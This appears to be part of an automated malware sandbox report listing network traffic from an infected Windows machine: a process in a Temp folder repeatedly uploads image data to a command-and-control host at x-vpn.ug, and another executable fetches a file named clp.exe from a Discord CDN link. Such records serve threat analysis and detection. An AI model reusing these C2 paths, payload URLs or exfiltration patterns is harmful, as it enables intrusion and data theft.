Aug 20, 2021 17:10:46.829041004 CEST	7865	IN	Data Raw: d5 fe cd 75 02 f7 d8 59 31 f6 89 32 5f 5e 5b c3 8d 40 00 56 57 89 c6 89 d7 81 e1 ff 00 00 00 f3 a6 5f 5e c3 8d 40 00 e9 03 00 00 00 c3 8b c0 53 31 db 85 c0 7c 4d 0f 84 9a 00 00 00 3d 00 14 00 00 0f 8d 81 00 00 00 89 c2 83 e2 1f 8d 14 92 db ac 53 Data Ascii: uY12_^[@VW_^@S1\|M=S5@tytS6@taC_7@S=}FS5@t4tS6@tC_7@5@[?
Aug 20, 2021 17:10:46.829072952 CEST	7866	IN	Data Raw: ff 73 11 81 f9 00 00 00 fe 72 07 0f bf c9 03 08 ff 21 ff e1 81 e1 ff ff ff 00 01 c1 89 d0 8b 11 e9 94 20 00 00 c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b d9 8b fa 8b f0 33 c0 55 68 a2 3a 40 00 64 ff 30 64 89 20 33 c0 89 03 8b d7 8b Data Ascii: sr! @USVW3]3Uh:@d0d 3qE}t8E@tt$PPMEPjU ;3ZYYdh:@E_^[YY]SVCt)2;0ur;pur;pur;
Aug 20, 2021 17:10:46.854496002 CEST	7867	IN	Data Raw: b7 fd ff ff ff e2 c3 31 d2 8b 4c 24 08 8b 44 24 04 83 c1 05 64 89 02 ff d1 c2 0c 00 c3 8b c0 55 8b ec 8b 55 08 8b 02 3d 92 00 00 c0 7f 2c 74 5c 3d 8e 00 00 c0 7f 15 74 57 2d 05 00 00 c0 74 5c 2d 87 00 00 00 74 3d 48 74 4e eb 60 05 71 ff ff 3f 83 Data Ascii: 1L$D$dUU=,t\=tW-t\-t=HtN`q?r6t0R=t=-t.HtHt$:-t/=t&,*&"%R]D$@=$AwD$PtqD$

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49721	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:46.706330061 CEST	7754	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:10:46.706841946 CEST	7754	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:10:46.707329988 CEST	7764	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:10:46.707741976 CEST	7766	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
Aug 20, 2021 17:10:46.733613968 CEST	7787	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
Aug 20, 2021 17:10:46.733849049 CEST	7790	OUT	Data Raw: 6d 7b e4 56 50 4f dc 16 81 45 2d 6c 62 5b d3 63 b2 9b 50 8a 1b f9 9e 08 25 ca 79 ca 40 11 b1 18 56 6e 0f ca 0e 33 df 19 ad 56 d3 2c 34 fd 62 df 44 bb b1 bf bf d5 48 11 cf 0d 9d e4 71 84 9d 9b 88 c1 31 be 70 08 07 dc 9f 4a cb d3 2f d7 4c be 5b df Data Ascii: m{VPOE-lb[cP%y@Vn3V,4bDHq1pJ/L[b*K yYs]b6o}t\|>$n5W5%}\]4]G]4{}\w>yx_uF8qm/XjcQDhf)bvmE,;h
Aug 20, 2021 17:10:46.733923912 CEST	7792	OUT	Data Raw: 38 53 69 41 a0 42 8e b4 e1 de 9b 4b 4d 08 5a 28 a5 a6 48 b8 a4 c5 28 14 a0 62 9d 80 6e 28 a5 34 94 02 0a 29 28 a4 01 4b 45 21 a0 05 a5 14 0a 29 80 b4 b4 94 a2 98 85 a3 34 94 50 84 3b 34 0e b4 0a 33 54 03 a8 a6 e6 81 41 36 16 96 92 8a 00 5a 28 a0 Data Ascii: 8SiABKMZ(H(bn(4)(KE!)4P;43TA6Z(SE-%-14JZ8ST!iE6UQIK@hU8STc/iEYGZm(4GN&iiLKf4j,L38)-4h&-$`4+
Aug 20, 2021 17:10:46.760837078 CEST	7801	OUT	Data Raw: 10 94 a0 52 e2 8e d4 c4 15 ea 5f 07 3c 21 a1 78 af fb 6b fb 6a c7 ed 5f 66 f2 3c af df 3a 6d dd e6 6e fb ac 33 f7 47 5f 4a f2 da f6 3f 81 77 16 30 5a f8 95 35 0b 88 61 82 65 b7 53 e7 4a 10 30 c4 a0 f2 48 f5 ac 6b df 91 d8 d2 85 b9 f5 3d 07 fe 15 Data Ascii: R_<!xkj_f<:mn3G_J?w0Z5aeSJ0Hk=st/n.yi2<O5EG*=A=z<?PHKb,I,9\:r0\|psm/M;KaY<bAyk>0zL^Xd
Aug 20, 2021 17:10:46.760874033 CEST	7806	OUT	Data Raw: 27 a9 1d ab e9 b4 35 ca 7c 54 3f f1 6c f5 7f fb 63 ff 00 a3 92 b9 28 66 f5 ea 55 8c 1a 56 6d 2e bf e6 6b 53 05 08 c5 b4 de 87 cd 34 51 45 7d 19 e6 8b 45 02 8a 62 0a 28 a2 98 1e c9 07 ec ff 00 7d 71 6d 14 e9 af db 05 91 03 80 6d db 38 23 3e b4 ff Data Ascii: '5\|T?lc(fUVm.kS4QE}Eb(}qmm8#>gG_^m}iayumjiv=4I4/i\Ud#Qvo<FPf6p}k\|WMK:WS(d_QmOcqkZn"dLd=k.\|9t{{('\v
Aug 20, 2021 17:10:46.760888100 CEST	7809	OUT	Data Raw: af df 49 f9 22 ea 3f dd 20 14 0a 4a 51 d2 ba 0e 51 c2 8a 41 4b 52 48 b4 a2 92 96 81 0b 4b 49 4b 48 90 a2 8a 29 00 52 d2 51 40 0b 45 14 50 01 4b 49 8a 5c 52 60 02 a4 8c 65 d4 7a 9a 68 ab 16 71 ef b9 41 ef 51 51 da 2c aa 6a f3 48 d0 f8 86 98 d2 b4 Data Ascii: I"? JQQAKRHKIKH)RQ@EPKI\R`ezhqAQQ,jHC&zW/WYUuSi^x?hyW=kO}[d+aX``! 5q!Gj4J<S?qpx&)uIhx`f$))SY
Aug 20, 2021 17:10:46.760898113 CEST	7814	OUT	Data Raw: ae 5e 54 7a 57 63 0c 49 c7 14 be 5a 1e d4 ea 33 4e c8 2e c6 f9 6b 4a 23 50 bb 71 c5 3a 8a 2c 85 76 34 c4 87 b5 1e 4a 7a 53 e9 68 e5 42 e6 63 04 28 0e 40 a9 69 05 2d 52 49 6c 26 db 18 d1 ab 9c 91 47 94 9c 71 d2 9f 45 16 42 bb 22 30 21 39 c5 28 85 Data Ascii: ^TzWcIZ3N.kJ#Pq:,v4JzShBc(@i-RIl&GqEB"0!9(qJ9PQG*J(APX:SWbYKKTZ5nG4Yv(aK[%i\|#8)h]d_gu F-RoqM(Hz:$wzviIIKM\)AJN
Aug 20, 2021 17:10:46.816540956 CEST	7852	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:46 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49722	162.159.135.233	80	C:\Users\user\Desktop\mosoxxxHack.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:46.974508047 CEST	7982	OUT	GET /attachments/710557342755848243/876828681815871488/clp.exe HTTP/1.1 Host: cdn.discordapp.com
Aug 20, 2021 17:10:46.996121883 CEST	7982	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 20 Aug 2021 15:10:46 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 20 Aug 2021 16:10:46 GMT Location: https://cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UXM0dswEAgm4%2B66ZKI5x9x6lXNh3hA3tLeGa1IhyU9V2P5HMcH4QpnGrkOeEqDCO6vOnQYOcXe3U%2FonKMCbV12gpoIgDGIoDdfoWGfI65qT3BOFhj%2Fjtq%2BBjaWLjLJX17qfDAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 681c8ce7a9234a5b-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49724	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:47.351043940 CEST	7993	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:10:47.351110935 CEST	7993	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:10:47.351315975 CEST	8003	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:10:47.351474047 CEST	8006	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
Aug 20, 2021 17:10:47.377011061 CEST	8009	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
Aug 20, 2021 17:10:47.377170086 CEST	8011	OUT	Data Raw: 76 dc 6b 9f 82 ee f2 da d6 e2 d6 de f2 e2 1b 6b 9c 79 f0 c7 2b 2a 4b 8e 9b 94 1c 36 3d ea 11 18 00 e0 75 ac 95 39 29 29 3f eb fa b1 b7 b5 56 d3 fa fe ae ce f2 f5 1a fb e2 7f 8a 74 4f 97 fe 26 f2 4d 6b 1e f3 80 26 0c 1e 2e 7b 7c e8 a3 fe 05 53 0d Data Ascii: vkky+K6=u9))?VtO&Mk&.{\|Sv+Oi.8m9 `yk^8Q/U_F.-b[GF2c"K6?tM!>U0\|dy)G~nSmo=u]K
Aug 20, 2021 17:10:47.377301931 CEST	8014	OUT	Data Raw: 28 a2 80 12 8a 28 a0 61 45 14 50 02 d1 cd 1c d1 cd 30 0e 68 a3 9a 39 a4 01 45 14 53 10 52 52 d2 52 18 52 f7 a4 a2 80 16 81 45 2d 34 21 0d 14 b4 50 02 50 69 68 a0 02 96 8a 28 00 34 94 b4 1a 60 25 21 a5 a2 90 08 28 34 ec 53 4d 00 14 52 d2 50 01 45 Data Ascii: ((aEP0h9ESRRRRE-4!PPih(4`%!(4SMRPEPEP0-RwEPJZ;RPE`QE1(RQEL@(QGA)i)iM&8p4Zb@EA)At+c,SQBb4Yg 9sF0iT_T
Aug 20, 2021 17:10:47.377315044 CEST	8019	OUT	Data Raw: 3d 88 c1 fd 2b dc bc 03 6f 06 9d e0 6b 69 ff 00 e7 a2 bc f2 b0 19 27 93 fc 80 02 bc a8 f8 23 c4 a3 fe 61 33 fe 6b fe 35 e8 5f 0e f5 8f b2 db bf 86 b5 2f dc 5f 5b 39 f2 e3 72 32 ca 7e 62 3e a3 27 8f 7f 6a e9 cc e7 0a d4 7f 75 24 ec ee ec fa 1c 79 Data Ascii: =+oki'#a3k5_/_[9r2~b>'ju$yd'FbSW7"O&X<Me4yE2g&z2@ureHykrp?lu1nX^AnQ^{o]5X&l#^Zj
Aug 20, 2021 17:10:47.377345085 CEST	8026	OUT	Data Raw: 88 29 45 1f 5a 29 80 b4 b4 82 9d 41 20 28 22 96 8a a1 5c 41 4a 46 69 69 71 45 82 e4 7e 5a fa 52 79 0a 6a 5c 53 b1 47 2a 0e 76 57 fb 3f bd 27 90 c3 a7 35 67 6d 28 14 7b 34 1e d1 94 8c 4e 3b 1a 36 91 da af 62 82 28 f6 61 ed 0a 38 34 a3 ad 5c f2 d4 Data Ascii: )EZ)A ("\AJFiiqE~ZRyj\SG*vW?'5gm({4N;6b(a84\6}E/fV7vr0i60E+0QNQERNSEQKF3LAKF)j(ZbZ(!h@AEQKLZdE-DQKH)iQKH)j"pLZu KZ(Rd($p
Aug 20, 2021 17:10:47.377381086 CEST	8029	OUT	Data Raw: 6d 7b e4 56 50 4f dc 16 81 45 2d 6c 62 5b d3 63 b2 9b 50 8a 1b f9 9e 08 25 ca 79 ca 40 11 b1 18 56 6e 0f ca 0e 33 df 19 ad 56 d3 2c 34 fd 62 df 44 bb b1 bf bf d5 48 11 cf 0d 9d e4 71 84 9d 9b 88 c1 31 be 70 08 07 dc 9f 4a cb d3 2f d7 4c be 5b df Data Ascii: m{VPOE-lb[cP%y@Vn3V,4bDHq1pJ/L[b*K yYs]b6o}t\|>$n5W5%}\]4]G]4{}\w>yx_uF8qm/XjcQDhf)bvmE,;h
Aug 20, 2021 17:10:47.377414942 CEST	8032	OUT	Data Raw: 38 53 69 41 a0 42 8e b4 e1 de 9b 4b 4d 08 5a 28 a5 a6 48 b8 a4 c5 28 14 a0 62 9d 80 6e 28 a5 34 94 02 0a 29 28 a4 01 4b 45 21 a0 05 a5 14 0a 29 80 b4 b4 94 a2 98 85 a3 34 94 50 84 3b 34 0e b4 0a 33 54 03 a8 a6 e6 81 41 36 16 96 92 8a 00 5a 28 a0 Data Ascii: 8SiABKMZ(H(bn(4)(KE!)4P;43TA6Z(SE-%-14JZ8ST!iE6UQIK@hU8STc/iEYGZm(4GN&iiLKf4j,L38)-4h&-$`4+
Aug 20, 2021 17:10:47.457683086 CEST	8091	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:47 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49725	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:47.806746006 CEST	9717	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:10:47.806878090 CEST	9718	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:10:47.807041883 CEST	9728	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:10:47.807146072 CEST	9730	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
Aug 20, 2021 17:10:47.833007097 CEST	9736	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
Aug 20, 2021 17:10:47.833034992 CEST	9739	OUT	Data Raw: 28 a2 80 12 8a 28 a0 61 45 14 50 02 d1 cd 1c d1 cd 30 0e 68 a3 9a 39 a4 01 45 14 53 10 52 52 d2 52 18 52 f7 a4 a2 80 16 81 45 2d 34 21 0d 14 b4 50 02 50 69 68 a0 02 96 8a 28 00 34 94 b4 1a 60 25 21 a5 a2 90 08 28 34 ec 53 4d 00 14 52 d2 50 01 45 Data Ascii: ((aEP0h9ESRRRRE-4!PPih(4`%!(4SMRPEPEP0-RwEPJZ;RPE`QE1(RQEL@(QGA)i)iM&8p4Zb@EA)At+c,SQBb4Yg 9sF0iT_T
Aug 20, 2021 17:10:47.833539009 CEST	9741	OUT	Data Raw: 3d 88 c1 fd 2b dc bc 03 6f 06 9d e0 6b 69 ff 00 e7 a2 bc f2 b0 19 27 93 fc 80 02 bc a8 f8 23 c4 a3 fe 61 33 fe 6b fe 35 e8 5f 0e f5 8f b2 db bf 86 b5 2f dc 5f 5b 39 f2 e3 72 32 ca 7e 62 3e a3 27 8f 7f 6a e9 cc e7 0a d4 7f 75 24 ec ee ec fa 1c 79 Data Ascii: =+oki'#a3k5_/_[9r2~b>'ju$yd'FbSW7"O&X<Me4yE2g&z2@ureHykrp?lu1nX^AnQ^{o]5X&l#^Zj
Aug 20, 2021 17:10:47.833586931 CEST	9744	OUT	Data Raw: 65 91 d1 58 b4 d1 92 51 b9 1d b7 1e 3a 7b 54 43 56 d4 8e 98 da 6b cd 6f 35 b3 33 b2 89 ad a2 91 e3 2c 72 db 1d 94 b2 02 46 70 a4 0c e7 d6 b1 8c 2a a9 5d f5 ff 00 24 6c e5 49 ab 2f eb 73 77 51 f0 be 95 a5 5d ea a2 ef 5c b8 fb 26 99 3c 76 93 4d 1d Data Ascii: eXQ:{TCVko53,rFp*]$lI/swQ]\&<vMgiqP>PIbG<zW[+=EW6wHn%%Fg5u~_8gXprW FN:GYxfkfy7Xv#}i[oHti)x,gbF>eI!
Aug 20, 2021 17:10:47.833690882 CEST	9747	OUT	Data Raw: 88 29 45 1f 5a 29 80 b4 b4 82 9d 41 20 28 22 96 8a a1 5c 41 4a 46 69 69 71 45 82 e4 7e 5a fa 52 79 0a 6a 5c 53 b1 47 2a 0e 76 57 fb 3f bd 27 90 c3 a7 35 67 6d 28 14 7b 34 1e d1 94 8c 4e 3b 1a 36 91 da af 62 82 28 f6 61 ed 0a 38 34 a3 ad 5c f2 d4 Data Ascii: )EZ)A ("\AJFiiqE~ZRyj\SG*vW?'5gm({4N;6b(a84\6}E/fV7vr0i60E+0QNQERNSEQKF3LAKF)j(ZbZ(!h@AEQKLZdE-DQKH)iQKH)j"pLZu KZ(Rd($p
Aug 20, 2021 17:10:47.833709955 CEST	9751	OUT	Data Raw: 48 e1 4b 49 45 32 47 53 87 4a 68 a0 50 21 e0 d2 d3 69 41 a0 43 85 3a 99 9a 50 69 92 3e 9c 0d 47 9a 70 34 08 90 1a 70 35 18 34 ec fa 53 21 a2 50 69 e1 aa 10 69 e0 d3 21 a2 70 d4 e0 41 ea 33 50 83 4e 06 95 88 68 79 85 1b b6 29 bf 65 cf 43 4a 0d 48 Data Ascii: HKIE2GSJhP!iAC:Pi>Gp4p54S!Pii!pA3PNhy)eCJH.;Sv`z4m6O]LljKy~z+Th4Q&EBsGjU"(aKgY{WXm9t\|7hg*NERhzWgsd+O(IsT\eR+Zb%Ntj&`w6
Aug 20, 2021 17:10:47.833741903 CEST	9756	OUT	Data Raw: 6d 7b e4 56 50 4f dc 16 81 45 2d 6c 62 5b d3 63 b2 9b 50 8a 1b f9 9e 08 25 ca 79 ca 40 11 b1 18 56 6e 0f ca 0e 33 df 19 ad 56 d3 2c 34 fd 62 df 44 bb b1 bf bf d5 48 11 cf 0d 9d e4 71 84 9d 9b 88 c1 31 be 70 08 07 dc 9f 4a cb d3 2f d7 4c be 5b df Data Ascii: m{VPOE-lb[cP%y@Vn3V,4bDHq1pJ/L[b*K yYs]b6o}t\|>$n5W5%}\]4]G]4{}\w>yx_uF8qm/XjcQDhf)bvmE,;h
Aug 20, 2021 17:10:47.914127111 CEST	9816	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:47 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49726	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:48.261291027 CEST	9816	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:10:48.261396885 CEST	9817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:10:48.261554003 CEST	9827	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:10:48.261653900 CEST	9829	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
Aug 20, 2021 17:10:48.287550926 CEST	9833	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
Aug 20, 2021 17:10:48.287657022 CEST	9850	OUT	Data Raw: 76 dc 6b 9f 82 ee f2 da d6 e2 d6 de f2 e2 1b 6b 9c 79 f0 c7 2b 2a 4b 8e 9b 94 1c 36 3d ea 11 18 00 e0 75 ac 95 39 29 29 3f eb fa b1 b7 b5 56 d3 fa fe ae ce f2 f5 1a fb e2 7f 8a 74 4f 97 fe 26 f2 4d 6b 1e f3 80 26 0c 1e 2e 7b 7c e8 a3 fe 05 53 0d Data Ascii: vkky+K6=u9))?VtO&Mk&.{\|Sv+Oi.8m9 `yk^8Q/U_F.-b[GF2c"K6?tM!>U0\|dy)G~nSmo=u]K
Aug 20, 2021 17:10:48.287698984 CEST	9852	OUT	Data Raw: 6d 7b e4 56 50 4f dc 16 81 45 2d 6c 62 5b d3 63 b2 9b 50 8a 1b f9 9e 08 25 ca 79 ca 40 11 b1 18 56 6e 0f ca 0e 33 df 19 ad 56 d3 2c 34 fd 62 df 44 bb b1 bf bf d5 48 11 cf 0d 9d e4 71 84 9d 9b 88 c1 31 be 70 08 07 dc 9f 4a cb d3 2f d7 4c be 5b df Data Ascii: m{VPOE-lb[cP%y@Vn3V,4bDHq1pJ/L[b*K yYs]b6o}t\|>$n5W5%}\]4]G]4{}\w>yx_uF8qm/XjcQDhf)bvmE,;h
